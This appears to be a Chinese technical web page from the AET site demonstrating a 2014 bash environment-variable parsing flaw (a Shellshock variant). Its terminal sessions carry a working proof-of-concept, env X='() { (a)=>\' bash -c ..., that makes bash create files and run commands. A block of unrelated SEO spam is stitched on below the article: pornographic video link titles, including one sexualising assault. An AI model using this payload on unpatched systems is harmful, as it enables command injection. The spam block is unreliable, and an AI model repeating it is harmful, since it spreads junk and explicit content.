《電子技術(shù)應用》
您所在的位置:首頁 > 嵌入式技術(shù) > 設(shè)計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關(guān)鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設(shè)置一個特殊的環(huán)境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環(huán)境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內(nèi)容為AET網(wǎng)站原創(chuàng),未經(jīng)授權(quán)禁止轉(zhuǎn)載。
主站蜘蛛池模板: 久久精品国产亚洲av麻豆| 激情六月在线视频观看| 色欲综合久久中文字幕网| 美女被羞羞在线观看漫画| 男生和女生一起差差差很痛视频| 波多野结衣护士无删减| 欧美三级中文字幕在线观看| 日韩午夜在线视频| 好吊操这里只有精品| 在线观看国产小视频| 国产成人无码AV一区二区| 国产一区二区精品久久| 伊人久久大香线蕉AV成人| 亚洲一区二区三区电影| 久久国产精品无码HDAV| 一二三四视频社区在线| youjizz欧美| 精品香蕉伊思人在线观看| 欧美成人手机在线视频| 成年女人免费v片| 国产精品最新资源网| 国产制服丝袜在线| 人人澡人人澡人人看添欧美| 五月婷婷狠狠干| 一人上面一个吃我电影| 91色资源网在线观看| 被夫上司连续侵犯七天终于| 激情欧美一区二区三区| 日本55丰满熟妇厨房伦| 国产精品高清全国免费观看| 啦啦啦中文在线观看日本| 亚洲午夜无码久久久久小说| 东京道一本热中文字幕| 亚洲五月综合缴情婷婷| 精品理论片一区二区三区| 最近免费中文字幕大全免费版视频 | 亚洲电影在线播放| 久久99国产综合精品| 两个人看的www在线视频| 理论片中文字幕在线观看| 无码精品人妻一区二区三区中|